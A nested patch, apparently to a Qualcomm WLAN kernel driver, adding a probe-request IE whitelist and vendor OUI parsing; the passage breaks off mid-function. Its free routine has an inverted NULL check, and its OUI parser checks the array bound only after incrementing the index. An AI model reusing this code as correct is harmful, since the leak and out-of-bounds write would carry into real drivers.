-@@ -8187,3 +8295,212 @@ void hdd_set_btc_bt_wlan_interval(hdd_context_t *hdd_ctx)
- if (VOS_STATUS_SUCCESS != status)
- hddLog(LOGE, "Fail to set enable bt wlan coex parameters");
- }
-+
-+/**
-+ * hdd_validate_prb_req_ie_bitmap - validates user input for ie bit map
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function checks whether user have entered valid probe request
-+ * ie bitmap and also verifies vendor ouis if vendor specific ie is set
-+ *
-+ * Return: status of verification
-+ * 1 - valid input
-+ * 0 - invalid input
-+ */
-+uint32_t hdd_validate_prb_req_ie_bitmap(hdd_context_t* pHddCtx)
-+{
-+ if (!(pHddCtx->cfg_ini->probe_req_ie_bitmap_0 ||
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_1 ||
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_2 ||
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_3 ||
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_4 ||
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_5 ||
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_6 ||
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_7))
-+ return 0;
-+
-+ /**
-+ * check whether vendor oui IE
is set and OUIs are present, each OUI
-+ * is eneterd in the form of string of 8 characters from ini, therefore,
-+ * for atleast one OUI, minimum length is 8 and hence this string length
-+ * is checked for minimum of 8
-+ */
-+ if ((pHddCtx->cfg_ini->probe_req_ie_bitmap_6 &
-+ VENDOR_SPECIFIC_IE_BITMAP) &&
-+ (strlen(pHddCtx->cfg_ini->probe_req_ouis) < 8))
-+ return 0;
-+
-+ /* check whether vendor oui IE is not set but OUIs are present */
-+ if (!(pHddCtx->cfg_ini->probe_req_ie_bitmap_6 &
-+ VENDOR_SPECIFIC_IE_BITMAP) &&
-+ (strlen(pHddCtx->cfg_ini->probe_req_ouis) > 0))
-+ return 0;
-+
-+ return 1;
-+}
-+
-+/**
-+ * probe_req_voui_convert_to_hex - converts str of 8 chars into two hex values
-+ * @temp: string to be converted
-+ * @voui: contains the type and subtype values
-+ *
-+ * This function converts the string length of 8 characters into two
-+ * hexa-decimal values, oui_type and oui_subtype, where oui_type is the
-+ * hexa decimal value converted from first 6 characters and oui_subtype is
-+ * hexa decimal value converted from last 2 characters.
-+ * strings which doesn't match with the specified pattern are ignored.
-+ *
-+ * Return: status of conversion
-+ * 1 - if conversion is successful
-+ * 0 - if conversion is failed
-+ */
-+static uint32_t hdd_probe_req_voui_convert_to_hex(uint8_t *temp,
-+ struct vendor_oui *voui)
-+{
-+ uint32_t hex_value[4];
-+ uint32_t i = 0;
-+ uint32_t indx = 0;
-+
-+ memset(hex_value, 0x00, sizeof(hex_value));
-+ memset(voui, 0x00, sizeof(*voui));
-+
-+ /* convert string to hex */
-+ for (i = 0; i < 8; i++) {
-+ if (temp[i] >= '0' && temp[i] <= '9') {
-+ hex_value[indx] = (temp[i] - '0') << 4;
-+ } else if (temp[i] >= 'A' && temp[i] <= 'F') {
-+ hex_value[indx] = (temp[i] - 'A') + 0xA;
-+ hex_value[indx] = hex_value[indx] << 4;
-+ } else {
-+ /* invalid character in oui */
-+ return 0;
-+ }
-+
-+ if (temp[i + 1] >= '0' && temp[i + 1] <= '9') {
-+ hex_value[indx] |= (temp[i + 1] - '0');
-+ i = i + 1;
-+ indx = indx + 1;
-+ } else if (temp[i + 1] >= 'A' && temp[i + 1] <= 'F') {
-+ hex_value[indx] |= ((temp[i + 1] - 'A') + 0xA);
-+ i = i + 1;
-+ indx = indx + 1;
-+ } else {
-+ /* invalid character in oui */
-+ return 0;
-+ }
-+ }
-+
-+ voui->oui_type = (hex_value[0] | (hex_value[1] << 8) |
-+ (hex_value[2] << 16));
-+ voui->oui_subtype = hex_value[3];
-+
-+ hddLog(LOG1, FL("OUI_type = %x and OUI_subtype = %x"), voui->oui_type,
-+ voui->oui_subtype);
-+ return 1;
-+}
-+
-+/**
-+ * hdd_parse_probe_req_ouis - form ouis from ini gProbeReqOUIs
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function parses the ini string gProbeReqOUIs which needs to in the
-+ * following format:
-+ * "<8 characters of [0-9] or [A-F]>space<8 characters from [0-9] etc.,"
-+ * example: "AABBCCDD 1122EEFF"
-+ * and the logic counts the number of OUIS and allocates the memory
-+ * for every valid OUI and is stored in hdd_context_t
-+ *
-+ * Return: status of parsing
-+ */
-+VOS_STATUS hdd_parse_probe_req_ouis(hdd_context_t* pHddCtx)
-+{
-+ struct vendor_oui voui[MAX_PROBE_REQ_OUIS];
-+ uint8_t *str;
-+ uint8_t temp[9];
-+ uint32_t start = 0, end = 0;
-+ uint32_t
oui_indx = 0;
-+ uint32_t i = 0;
-+
-+ pHddCtx->cfg_ini->probe_req_ouis[MAX_PRB_REQ_VENDOR_OUI_INI_LEN - 1] =
-+ '\0';
-+ if (!strlen(pHddCtx->cfg_ini->probe_req_ouis)) {
-+ pHddCtx->no_of_probe_req_ouis = 0;
-+ pHddCtx->probe_req_voui = NULL;
-+ hddLog(LOG1, FL("NO OUIS to parse"));
-+ return VOS_STATUS_SUCCESS;
-+ }
-+
-+ str = (uint8_t *)(pHddCtx->cfg_ini->probe_req_ouis);
-+
-+ while(str[i] != '\0') {
-+ if (str[i] == ' ') {
-+ if ((end - start) != 8)
-+ {
-+ end = start = 0;
-+ i++;
-+ continue;
-+ } else {
-+ memcpy(temp, &str[i - 8], 8);
-+ i++;
-+ temp[8] = '\0';
-+ if (hdd_probe_req_voui_convert_to_hex(temp,
-+ &voui[oui_indx]) == 0) {
-+ continue;
-+ }
-+ oui_indx++;
-+ if (oui_indx > MAX_PROBE_REQ_OUIS) {
-+ hddLog(LOGE, "Max no.of OUIS supported "
-+ "is 16. ignoring the rest");
-+ return VOS_STATUS_SUCCESS;
-+ }
-+ }
-+ start = end = 0;
-+ } else {
-+ i++;
-+ end++;
-+ }
-+ }
-+
-+ if ((end - start) == 8) {
-+ memcpy(temp, &str[i - 8], 8);
-+ temp[8] = '\0';
-+ if (hdd_probe_req_voui_convert_to_hex(temp,
-+ &voui[oui_indx]) == 1)
-+ oui_indx++;
-+ }
-+
-+ if (!oui_indx)
-+ return VOS_STATUS_SUCCESS;
-+
-+ pHddCtx->probe_req_voui = (struct vendor_oui *)vos_mem_malloc(oui_indx *
-+ sizeof(struct vendor_oui));
-+ if (pHddCtx->probe_req_voui == NULL) {
-+ hddLog(LOGE,"Not Enough memory for OUI");
-+ pHddCtx->no_of_probe_req_ouis = 0;
-+ return VOS_STATUS_E_FAILURE;
-+ }
-+ vos_mem_zero(pHddCtx->probe_req_voui,
-+ oui_indx * sizeof(struct vendor_oui));
-+ pHddCtx->no_of_probe_req_ouis = oui_indx;
-+ vos_mem_copy(pHddCtx->probe_req_voui, voui,
-+ oui_indx * sizeof(struct vendor_oui));
-+
-+ return VOS_STATUS_SUCCESS;
-+}
-+
-+/**
-+ * hdd_free_probe_req_ouis - de-allocates the probe req ouis
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function de-alloactes the probe req ouis which are
-+ * allocated while parsing of ini string gProbeReqOUIs
-+ *
-+ * Return: None
-+ */
-+void hdd_free_probe_req_ouis(hdd_context_t* pHddCtx)
-+{
-+ if
(!pHddCtx->probe_req_voui)
-+ vos_mem_free(pHddCtx->probe_req_voui);
-+
-+ pHddCtx->no_of_probe_req_ouis = 0;
-+}
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b61bbdb..d51350e 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1578,6 +1578,49 @@ wlan_hdd_cfg80211_get_supported_features(struct wiphy *wiphy,
- }
-
- /**
-+ * wlan_hdd_fill_whitelist_ie_attrs - fill the white list members
-+ * @ie_whitelist: enables whitelist
-+ * @probe_req_ie_bitmap: bitmap to be filled
-+ * @num_vendor_oui: pointer to no of ouis
-+ * @voui: pointer to ouis to be filled
-+ * @pHddCtx: pointer to hdd ctx
-+ *
-+ * This function fills the ie bitmap and vendor oui fields with the
-+ * corresponding values present in cfg_ini and PHddCtx
-+ *
-+ * Return: Return none
-+ */
-+static void wlan_hdd_fill_whitelist_ie_attrs(bool *ie_whitelist,
-+ uint32_t *probe_req_ie_bitmap,
-+ uint32_t *num_vendor_oui,
-+ struct vendor_oui *voui,
-+ hdd_context_t *pHddCtx)
-+{
-+ uint32_t i = 0;
-+
-+ *ie_whitelist = true;
-+ probe_req_ie_bitmap[0] = pHddCtx->cfg_ini->probe_req_ie_bitmap_0;
-+ probe_req_ie_bitmap[1] = pHddCtx->cfg_ini->probe_req_ie_bitmap_1;
-+ probe_req_ie_bitmap[2] = pHddCtx->cfg_ini->probe_req_ie_bitmap_2;
-+ probe_req_ie_bitmap[3] = pHddCtx->cfg_ini->probe_req_ie_bitmap_3;
-+ probe_req_ie_bitmap[4] = pHddCtx->cfg_ini->probe_req_ie_bitmap_4;
-+ probe_req_ie_bitmap[5] = pHddCtx->cfg_ini->probe_req_ie_bitmap_5;
-+ probe_req_ie_bitmap[6] = pHddCtx->cfg_ini->probe_req_ie_bitmap_6;
-+ probe_req_ie_bitmap[7] = pHddCtx->cfg_ini->probe_req_ie_bitmap_7;
-+
-+ *num_vendor_oui = 0;
-+
-+ if ((pHddCtx->no_of_probe_req_ouis != 0) && (voui != NULL)) {
-+ *num_vendor_oui = pHddCtx->no_of_probe_req_ouis;
-+ for (i = 0; i < pHddCtx->no_of_probe_req_ouis; i++) {
-+ voui[i].oui_type = pHddCtx->probe_req_voui[i].oui_type;
-+ voui[i].oui_subtype =
-+ pHddCtx->probe_req_voui[i].oui_subtype;
-+ }
-+ }
-+}
-+
-+/**
- *
__wlan_hdd_cfg80211_set_scanning_mac_oui() - set scan MAC
- * @wiphy: pointer to wireless wiphy structure.
- * @wdev: pointer to wireless_dev structure.
-@@ -1625,12 +1668,16 @@ __wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy,
- return -EINVAL;
- }
-
-- pReqMsg = vos_mem_malloc(sizeof(*pReqMsg));
-+ pReqMsg = vos_mem_malloc(sizeof(*pReqMsg) +
-+ (pHddCtx->no_of_probe_req_ouis) *
-+ (sizeof(struct vendor_oui)));
- if (!pReqMsg) {
- hddLog(LOGE, FL("vos_mem_malloc failed"));
- return -ENOMEM;
- }
-- vos_mem_zero(pReqMsg, sizeof(*pReqMsg));
-+ vos_mem_zero(pReqMsg, sizeof(*pReqMsg) +
-+ (pHddCtx->no_of_probe_req_ouis) *
-+ (sizeof(struct vendor_oui)));
-
- /* Parse and fetch oui */
- if (!tb[QCA_WLAN_VENDOR_ATTR_SET_SCANNING_MAC_OUI]) {
-@@ -1647,7 +1694,15 @@ __wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy,
- pReqMsg->enb_probe_req_sno_randomization = 1;
-
- hddLog(LOG1, FL("Oui (%02x:%02x:%02x), vdev_id = %d"), pReqMsg->oui[0],
-- pReqMsg->oui[1], pReqMsg->oui[2], pReqMsg->vdev_id);
-+ pReqMsg->oui[1], pReqMsg->oui[2], pReqMsg->vdev_id);
-+
-+ if (pHddCtx->cfg_ini->probe_req_ie_whitelist)
-+ wlan_hdd_fill_whitelist_ie_attrs(&pReqMsg->ie_whitelist,
-+ pReqMsg->probe_req_ie_bitmap,
-+ &pReqMsg->num_vendor_oui,
-+ (struct vendor_oui *)((uint8_t *)pReqMsg +
-+ sizeof(*pReqMsg)),
-+ pHddCtx);
-
- status = sme_SetScanningMacOui(pHddCtx->hHal, pReqMsg);
- if (!HAL_STATUS_SUCCESS(status)) {
-@@ -18805,6 +18860,25 @@ int __wlan_hdd_cfg80211_scan( struct wiphy *wiphy,
- wlan_hdd_update_scan_rand_attrs((void *)&scanRequest, (void *)request,
- WLAN_HDD_HOST_SCAN);
-
-+ if (pHddCtx->no_of_probe_req_ouis != 0) {
-+ scanRequest.voui = (struct vendor_oui *)vos_mem_malloc(
-+ pHddCtx->no_of_probe_req_ouis *
-+ sizeof(struct vendor_oui));
-+ if (!scanRequest.voui) {
-+ hddLog(LOGE, FL("Not enough memory for voui"));
-+ scanRequest.num_vendor_oui = 0;
-+ status = -ENOMEM;
-+ goto free_mem;
-+ }
-+ }
-+
-+ if (pHddCtx->cfg_ini->probe_req_ie_whitelist)
-+
wlan_hdd_fill_whitelist_ie_attrs(&scanRequest.ie_whitelist,
-+ scanRequest.probe_req_ie_bitmap,
-+ &scanRequest.num_vendor_oui,
-+ scanRequest.voui,
-+ pHddCtx);
-+
- vos_runtime_pm_prevent_suspend(pHddCtx->runtime_context.scan);
- status = sme_ScanRequest( WLAN_HDD_GET_HAL_CTX(pAdapter),
- pAdapter->sessionId, &scanRequest, &scanId,
-@@ -18846,6 +18920,9 @@ free_mem:
- if( channelList )
- vos_mem_free( channelList );
-
-+ if(scanRequest.voui)
-+ vos_mem_free(scanRequest.voui);
-+
- EXIT();
- return status;
- }
-@@ -22819,7 +22896,9 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
- return -ENOTSUPP;
- }
-
-- pPnoRequest = (tpSirPNOScanReq) vos_mem_malloc(sizeof (tSirPNOScanReq));
-+ pPnoRequest = (tpSirPNOScanReq) vos_mem_malloc(sizeof(tSirPNOScanReq) +
-+ (pHddCtx->no_of_probe_req_ouis) *
-+ (sizeof(struct vendor_oui)));
- if (NULL == pPnoRequest)
- {
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
-@@ -22827,7 +22906,9 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
- return -ENOMEM;
- }
-
-- memset(pPnoRequest, 0, sizeof (tSirPNOScanReq));
-+ memset(pPnoRequest, 0, sizeof (tSirPNOScanReq) +
-+ (pHddCtx->no_of_probe_req_ouis) *
-+ (sizeof(struct vendor_oui)));
- pPnoRequest->enable = 1; /*Enable PNO */
- pPnoRequest->ucNetworksCount = request->n_match_sets;
- if ((!pPnoRequest->ucNetworksCount ) ||
-@@ -22985,6 +23066,15 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
- wlan_hdd_update_scan_rand_attrs((void *)pPnoRequest, (void *)request,
- WLAN_HDD_PNO_SCAN);
-
-+ if (pHddCtx->cfg_ini->probe_req_ie_whitelist)
-+ wlan_hdd_fill_whitelist_ie_attrs(&pPnoRequest->ie_whitelist,
-+ pPnoRequest->probe_req_ie_bitmap,
-+ &pPnoRequest->num_vendor_oui,
-+ (struct vendor_oui *)(
-+ (uint8_t *)pPnoRequest +
-+ sizeof(*pPnoRequest)),
-+ pHddCtx);
-+
- status = sme_SetPreferredNetworkList(WLAN_HDD_GET_HAL_CTX(pAdapter),
- pPnoRequest, pAdapter->sessionId,
- hdd_cfg80211_sched_scan_done_callback,
pAdapter);
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index 9a1922b..b967a67 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -13334,6 +13334,7 @@ free_hdd_ctx:
-
- wlan_hdd_deinit_chan_info(pHddCtx);
- wlan_hdd_deinit_tx_rx_histogram(pHddCtx);
-+ hdd_free_probe_req_ouis(pHddCtx);
- wiphy_unregister(wiphy) ;
- wlan_hdd_cfg80211_deinit(wiphy);
- wiphy_free(wiphy) ;
-@@ -14926,6 +14927,27 @@ int hdd_wlan_startup(struct device *dev, v_VOID_t *hif_sc)
- if (!hdd_ipa_is_present(pHddCtx))
- hdd_ipa_reset_ipaconfig(pHddCtx, 0);
-
-+ if (pHddCtx->cfg_ini->probe_req_ie_whitelist)
-+ {
-+ if (hdd_validate_prb_req_ie_bitmap(pHddCtx))
-+ {
-+ /* parse ini string probe req oui */
-+ status = hdd_parse_probe_req_ouis(pHddCtx);
-+ if (VOS_STATUS_SUCCESS != status)
-+ {
-+ hddLog(LOGE, FL("Error parsing probe req ouis - Ignoring them"
-+ " disabling white list"));
-+ pHddCtx->cfg_ini->probe_req_ie_whitelist = false;
-+ }
-+ }
-+ else
-+ {
-+ hddLog(LOGE, FL("invalid probe req ie bitmap and ouis,"
-+ " disabling white list"));
-+ pHddCtx->cfg_ini->probe_req_ie_whitelist = false;
-+ }
-+ }
-+
- if (0 == pHddCtx->cfg_ini->max_go_peers)
- pHddCtx->cfg_ini->max_go_peers = pHddCtx->cfg_ini->max_sap_peers;
-
-@@ -15944,8 +15966,10 @@ err_histogram:
-
- err_free_hdd_context:
- /* wiphy_free() will free the HDD context so remove global reference */
-- if (pVosContext)
-+ if (pVosContext) {
-+ hdd_free_probe_req_ouis(pHddCtx);
- ((VosContextType*)(pVosContext))->pHDDContext = NULL;
-+ }
-
- wiphy_free(wiphy) ;
- //kfree(wdev) ;
-diff --git a/CORE/MAC/inc/sirApi.h b/CORE/MAC/inc/sirApi.h
-index 83d53be..36f71b6 100644
---- a/CORE/MAC/inc/sirApi.h
-+++ b/CORE/MAC/inc/sirApi.h
-@@ -89,6 +89,7 @@ typedef tANI_U8 tSirVersionString[SIR_VERSION_STRING_LEN];
- #define MAXNUM_PERIODIC_TX_PTRNS 6
-
- #define WIFI_SCANNING_MAC_OUI_LENGTH 3
-+#define PROBE_REQ_BITMAP_LEN 8
-
- #define MAX_LEN_UDP_RESP_OFFLOAD 128
-
-@@ -945,6 +946,11 @@
typedef struct sSirSmeScanReq
- uint32_t enable_scan_randomization;
- uint8_t mac_addr[VOS_MAC_ADDR_SIZE];
- uint8_t mac_addr_mask[VOS_MAC_ADDR_SIZE];
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ uint32_t oui_field_len;
-+ uint32_t oui_field_offset;
-
- //channelList MUST be the last field of this structure
- tSirChannelList channelList;
-@@ -964,7 +970,10 @@ typedef struct sSirSmeScanReq
- ----------------------------- <--+
- ... variable size uIEFiled
- up to uIEFieldLen (can be 0)
-- -----------------------------*/
-+ -----------------------------
-+ ... variable size upto num_vendor_oui
-+ struct vendor_oui voui;
-+ */
- } tSirSmeScanReq, *tpSirSmeScanReq;
-
- typedef struct sSirSmeScanAbortReq
-@@ -3810,6 +3819,10 @@ typedef struct sSirPNOScanReq {
- uint32_t enable_pno_scan_randomization;
- uint8_t mac_addr[VOS_MAC_ADDR_SIZE];
- uint8_t mac_addr_mask[VOS_MAC_ADDR_SIZE];
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ /* followed by one or more struct vendor_oui */
- } tSirPNOScanReq, *tpSirPNOScanReq;
-
- typedef struct sSirSetRSSIFilterReq
-@@ -4536,6 +4549,11 @@ typedef struct sSirScanOffloadReq {
- uint32_t enable_scan_randomization;
- uint8_t mac_addr[VOS_MAC_ADDR_SIZE];
- uint8_t mac_addr_mask[VOS_MAC_ADDR_SIZE];
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ uint32_t oui_field_len;
-+ uint32_t oui_field_offset;
-
- tSirChannelList channelList;
- /*-----------------------------
-@@ -4554,7 +4572,10 @@ typedef struct sSirScanOffloadReq {
- ----------------------------- <--+
- ... variable size uIEField
- up to uIEFieldLen (can be 0)
-- -----------------------------*/
-+ -----------------------------
-+ ...
variable size upto num_vendor_oui
-+ struct vendor_oui voui;
-+ ------------------------*/
- } tSirScanOffloadReq, *tpSirScanOffloadReq;
-
- /**
-@@ -5823,11 +5844,25 @@ typedef struct
- tANI_U8 stopReq;
- } tSirLLStatsClearReq, *tpSirLLStatsClearReq;
-
-+/**
-+ * struct vendor_oui - probe request ie vendor oui information
-+ * @oui_type: type of the vendor oui (3 valid octets)
-+ * @oui_subtype: subtype of the vendor oui (1 valid octet)
-+ */
-+struct vendor_oui {
-+ uint32_t oui_type;
-+ uint32_t oui_subtype;
-+};
-+
- typedef struct
- {
- tANI_U8 oui[WIFI_SCANNING_MAC_OUI_LENGTH];
- uint32_t vdev_id;
- uint32_t enb_probe_req_sno_randomization;
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ /* Followed by 0 or more struct vendor_oui */
- } tSirScanMacOui, *tpSirScanMacOui;
-
- enum {
-diff --git a/CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c b/CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c
-index a6a7879..d1629bc 100644
---- a/CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c
-+++ b/CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c
-@@ -1233,7 +1233,7 @@ static eHalStatus limSendHalStartScanOffloadReq(tpAniSirGlobal pMac,
- /* The tSirScanOffloadReq will reserve the space for first channel,
- so allocate the memory for (numChannels - 1) and uIEFieldLen */
- len = sizeof(tSirScanOffloadReq) + (pScanReq->channelList.numChannels - 1) +
-- pScanReq->uIEFieldLen;
-+ pScanReq->uIEFieldLen + pScanReq->oui_field_len;
-
- if (!pMac->per_band_chainmask_supp) {
- if (IS_DOT11_MODE_HT(pScanReq->dot11mode)) {
-@@ -1332,7 +1332,8 @@ static eHalStatus limSendHalStartScanOffloadReq(tpAniSirGlobal pMac,
-
- pScanOffloadReq->uIEFieldLen = pScanReq->uIEFieldLen;
- pScanOffloadReq->uIEFieldOffset = len - addn_ie_len -
-- pScanOffloadReq->uIEFieldLen;
-+ pScanOffloadReq->uIEFieldLen -
-+ pScanReq->oui_field_len;
- vos_mem_copy(
- (tANI_U8 *) pScanOffloadReq + pScanOffloadReq->uIEFieldOffset,
- (tANI_U8 *) pScanReq +
pScanReq->uIEFieldOffset,
-@@ -1395,6 +1396,23 @@ static eHalStatus limSendHalStartScanOffloadReq(tpAniSirGlobal pMac,
- VOS_MAC_ADDR_SIZE);
- }
-
-+ pScanOffloadReq->oui_field_len = pScanReq->oui_field_len;
-+ pScanOffloadReq->num_vendor_oui = pScanReq->num_vendor_oui;
-+ pScanOffloadReq->ie_whitelist = pScanReq->ie_whitelist;
-+ if (pScanOffloadReq->ie_whitelist)
-+ vos_mem_copy(pScanOffloadReq->probe_req_ie_bitmap,
-+ pScanReq->probe_req_ie_bitmap,
-+ PROBE_REQ_BITMAP_LEN * sizeof(uint32_t));
-+ pScanOffloadReq->oui_field_offset = sizeof(tSirScanOffloadReq) +
-+ (pScanOffloadReq->channelList.numChannels - 1) +
-+ pScanOffloadReq->uIEFieldLen;
-+ if (pScanOffloadReq->num_vendor_oui != 0) {
-+ vos_mem_copy(
-+ (tANI_U8 *) pScanOffloadReq + pScanOffloadReq->oui_field_offset,
-+ (uint8_t *) pScanReq + pScanReq->oui_field_offset,
-+ pScanReq->oui_field_len);
-+ }
-+
- rc = wdaPostCtrlMsg(pMac, &msg);
- if (rc != eSIR_SUCCESS)
- {
-diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c
-index c89f31b..e24b0e6 100644
---- a/CORE/SERVICES/WMA/wma.c
-+++ b/CORE/SERVICES/WMA/wma.c
-@@ -9884,6 +9884,8 @@ VOS_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- u_int8_t SSID_num;
- int i;
- int len = sizeof(*cmd);
-+ wmi_vendor_oui *voui = NULL;
-+ struct vendor_oui *pvoui = NULL;
- tpAniSirGlobal pMac = (tpAniSirGlobal )vos_get_context(VOS_MODULE_ID_PE,
- wma_handle->vos_context);
-
-@@ -9908,6 +9910,10 @@ VOS_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- if (scan_req->uIEFieldLen)
- len += roundup(scan_req->uIEFieldLen, sizeof(u_int32_t));
-
-+ len += WMI_TLV_HDR_SIZE; /* Length of TLV for array of wmi_vendor_oui */
-+ if (scan_req->num_vendor_oui)
-+ len += scan_req->num_vendor_oui * sizeof(wmi_vendor_oui);
-+
- /* Allocate the memory */
- *buf = wmi_buf_alloc(wma_handle->wmi_handle, len);
- if (!*buf) {
-@@ -10010,8 +10016,19 @@ VOS_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
-
WMI_CHAR_ARRAY_TO_MAC_ADDR(scan_req->mac_addr_mask,
- &cmd->mac_mask);
- }
-+ if (scan_req->ie_whitelist)
-+ cmd->scan_ctrl_flags |=
-+ WMI_SCAN_ENABLE_IE_WHTELIST_IN_PROBE_REQ;
-+
- WMA_LOGI("scan_ctrl_flags = %x", cmd->scan_ctrl_flags);
-
-+ if (scan_req->ie_whitelist) {
-+ for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+ cmd->ie_bitmap[i] = scan_req->probe_req_ie_bitmap[i];
-+ }
-+
-+ cmd->num_vendor_oui = scan_req->num_vendor_oui;
-+
- if (!scan_req->p2pScanType) {
- WMA_LOGD("Normal Scan request");
- cmd->scan_ctrl_flags |= WMI_SCAN_ADD_CCK_RATES;
-@@ -10233,6 +10250,29 @@ VOS_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- }
- buf_ptr += WMI_TLV_HDR_SIZE + ie_len_with_pad;
-
-+ /* mac randomization */
-+ WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC,
-+ scan_req->num_vendor_oui *
-+ sizeof(wmi_vendor_oui));
-+
-+ buf_ptr += WMI_TLV_HDR_SIZE;
-+
-+ if (cmd->num_vendor_oui != 0) {
-+ voui = (wmi_vendor_oui *)buf_ptr;
-+ pvoui = (struct vendor_oui *)((u_int8_t *)scan_req +
-+ (scan_req->oui_field_offset));
-+ for (i = 0; i < cmd->num_vendor_oui; i++) {
-+ WMITLV_SET_HDR(&voui[i].tlv_header,
-+ WMITLV_TAG_STRUC_wmi_vendor_oui,
-+ WMITLV_GET_STRUCT_TLVLEN(
-+ wmi_vendor_oui));
-+ voui[i].oui_type_subtype = pvoui[i].oui_type |
-+ (pvoui[i].oui_subtype << 24);
-+ }
-+ buf_ptr += cmd->num_vendor_oui *
-+ sizeof(wmi_vendor_oui);
-+ }
-+
- *buf_len = len;
- return VOS_STATUS_SUCCESS;
- error:
-@@ -20530,17 +20570,24 @@ static VOS_STATUS wma_pno_start(tp_wma_handle wma, tpSirPNOScanReq pno)
- u_int8_t *buf_ptr;
- u_int8_t i;
- int ret;
-+ wmi_vendor_oui *voui = NULL;
-+ struct vendor_oui *pvoui = NULL;
-
- WMA_LOGD("PNO Start");
-
- len = sizeof(*cmd) +
- WMI_TLV_HDR_SIZE + /* TLV place holder for array of structures nlo_configured_parameters(nlo_list) */
-- WMI_TLV_HDR_SIZE; /* TLV place holder for array of uint32 channel_list */
-+ WMI_TLV_HDR_SIZE + /* TLV place holder for array of uint32 channel_list */
-+ WMI_TLV_HDR_SIZE + /* TLV of
nlo_channel_prediction_cfg */ -+ WMI_TLV_HDR_SIZE; /* array of wmi_vendor_oui */ - - len += sizeof(u_int32_t) * MIN(pno->aNetworks[0].ucChannelCount, - WMI_NLO_MAX_CHAN); - len += sizeof(nlo_configured_parameters) * - MIN(pno->ucNetworksCount, WMI_NLO_MAX_SSIDS); -+ /* Add the fixed length of enlo_candidate_score_params */ -+ len += sizeof(enlo_candidate_score_params); -+ len += sizeof(wmi_vendor_oui) * pno->num_vendor_oui; - - buf = wmi_buf_alloc(wma->wmi_handle, len); - if (!buf) { -@@ -20578,8 +20625,19 @@ static VOS_STATUS wma_pno_start(tp_wma_handle wma, tpSirPNOScanReq pno) - WMI_CHAR_ARRAY_TO_MAC_ADDR(pno->mac_addr, &cmd->mac_addr); - WMI_CHAR_ARRAY_TO_MAC_ADDR(pno->mac_addr_mask, &cmd->mac_mask); - } -+ -+ if (pno->ie_whitelist) -+ cmd->flags |= WMI_NLO_CONFIG_ENABLE_IE_WHITELIST_IN_PROBE_REQ; -+ - WMA_LOGI("pno flags = %x", cmd->flags); - -+ cmd->num_vendor_oui = pno->num_vendor_oui; -+ -+ if (pno->ie_whitelist) { -+ for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++) -+ cmd->ie_bitmap[i] = pno->probe_req_ie_bitmap[i]; -+ } -+ - buf_ptr += sizeof(wmi_nlo_config_cmd_fixed_param); - - cmd->no_of_ssids = MIN(pno->ucNetworksCount, WMI_NLO_MAX_SSIDS); -@@ -20640,6 +20698,37 @@ static VOS_STATUS wma_pno_start(tp_wma_handle wma, tpSirPNOScanReq pno) - } - buf_ptr += cmd->num_of_channels * sizeof(u_int32_t); - -+ /* -+ * For pno start, this is not needed but to get the correct offset of -+ * wmi_vendor_oui, this is needed -+ */ -+ WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC, 0); -+ buf_ptr += WMI_TLV_HDR_SIZE; /* zero no.of nlo_channel_prediction_cfg */ -+ WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_STRUC_enlo_candidate_score_param, -+ WMITLV_GET_STRUCT_TLVLEN(enlo_candidate_score_params)); -+ buf_ptr += sizeof(enlo_candidate_score_params); -+ -+ /* ie white list */ -+ WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC, -+ pno->num_vendor_oui * -+ sizeof(wmi_vendor_oui)); -+ -+ buf_ptr += WMI_TLV_HDR_SIZE; -+ -+ if (cmd->num_vendor_oui != 0) { -+ voui = (wmi_vendor_oui *)buf_ptr; -+ 
